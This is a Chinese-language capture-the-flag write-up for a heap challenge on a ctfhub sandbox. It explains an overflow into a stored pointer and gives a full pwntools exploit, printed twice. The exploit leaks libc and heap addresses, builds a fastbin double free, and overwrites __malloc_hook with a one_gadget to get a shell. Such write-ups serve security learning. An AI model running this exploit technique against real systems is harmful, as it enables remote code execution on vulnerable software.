分析
先讲一下漏洞点
这里有个很迷惑的地方就是 read(0, v6, 0x18uLL);,一开始始终没有找到漏洞出现的地方,结果问里一下其他师傅,恍然大悟,我就是傻子。
这里可以向v6中读入0x18个字节的大小。刚好可以覆盖ptr处的低4字节。可以利用这个特点构造double free来进行攻击。
利用
这里只是简单讲一下,一定要动手调试!!!调试!!!调试!!!
先把前面的代码写好
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",32809)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
def add(size,data):
ru(b"choice:")
sl(b"1")
ru(b"size:")
sl(str(size))
ru(b"msg:")
s(data)
def free():
ru(b"choice:")
sl(b"2")
def show():
ru(b"choice:")
sl(b"3")
这题的ptr只能储存一个chunk的指针,且题目中已经有个0x110大小的chunk,进入了unsorted bins,先申请0x68字节大小的chunk,其会从unsorted bin中分割0x71大小的chunk给我们,利用这个特性可以泄露出libc地址。
add(0x68,b"a"*8)
show()
ru(b"a"*8)
main_arean = uu64(r(6))
libc_base = main_arean-88-0x10-libc.sym['__malloc_hook']-0x100
malloc_hook = libc_base+libc.sym['__malloc_hook']
realloc_hook = libc_base+libc.sym["realloc"]
fake_chunk = malloc_hook-0x23
gadget = [0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget = libc_base+gadget[3]
print("libc_base---------------------> :",hex(libc_base))
print("fake_chunk--------------------> :",hex(fake_chunk))
之后再泄露heap的地址,其实也可以不用泄露,可以爆破低2字节的16进制数,概率是1/16,但我不想爆破,所以直接泄露heap的地址。
add(0x68,b"aaaa")
free()
add(0x10,b"aaaa")
ru(b"choice:")
s(b"b"*0x14+b"\x10")
free()
add(0x60,b"\x10")
show()
heap_addr = uu64(r(6))-0x10
print("heap_addr------------>: ",hex(heap_addr))
free()
add(0x10,b"aaaa")
offset = int(hex(heap_addr)[10:12],16)
print(hex(offset))
这里利用了fastbin的特性,泄露了fd指针。
之后就可以构造double free了。
ru(b"choice:")
s(b"b"*0x14+b"\x80"+p8(offset))
free()
add(0x60,p64(fake_chunk))
add(0x60,b"a")
add(0x60,b"a"*0x13+p64(one_gadget))
# add(0x60,b"a"*3+p64(0)+p64(one_gadget)+p64(realloc_hook+16))
add(0x60,b"a"*0x13+p64(one_gadget))
ru(b"choice:")
s(b"1")
ru(b"size:")
sl(b"32")
最后的exp为:
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",32809)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
def add(size,data):
ru(b"choice:")
sl(b"1")
ru(b"size:")
sl(str(size))
ru(b"msg:")
s(data)
def free():
ru(b"choice:")
sl(b"2")
def show():
ru(b"choice:")
sl(b"3")
add(0x68,b"a"*8)
show()
ru(b"a"*8)
main_arean = uu64(r(6))
libc_base = main_arean-88-0x10-libc.sym['__malloc_hook']-0x100
malloc_hook = libc_base+libc.sym['__malloc_hook']
realloc_hook = libc_base+libc.sym["realloc"]
fake_chunk = malloc_hook-0x23
gadget = [0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget = libc_base+gadget[3]
print("libc_base---------------------> :",hex(libc_base))
print("fake_chunk--------------------> :",hex(fake_chunk))
add(0x68,b"aaaa")
free()
add(0x10,b"aaaa")
ru(b"choice:")
s(b"b"*0x14+b"\x10")
free()
add(0x60,b"\x10")
show()
heap_addr = uu64(r(6))-0x10
print("heap_addr------------>: ",hex(heap_addr))
free()
add(0x10,b"aaaa")
offset = int(hex(heap_addr)[10:12],16)
print(hex(offset))
ru(b"choice:")
s(b"b"*0x14+b"\x80"+p8(offset))
free()
add(0x60,p64(fake_chunk))
add(0x60,b"a")
add(0x60,b"a"*0x13+p64(one_gadget))
# add(0x60,b"a"*3+p64(0)+p64(one_gadget)+p64(realloc_hook+16))
add(0x60,b"a"*0x13+p64(one_gadget))
ru(b"choice:")
s(b"1")
ru(b"size:")
sl(b"32")
itr()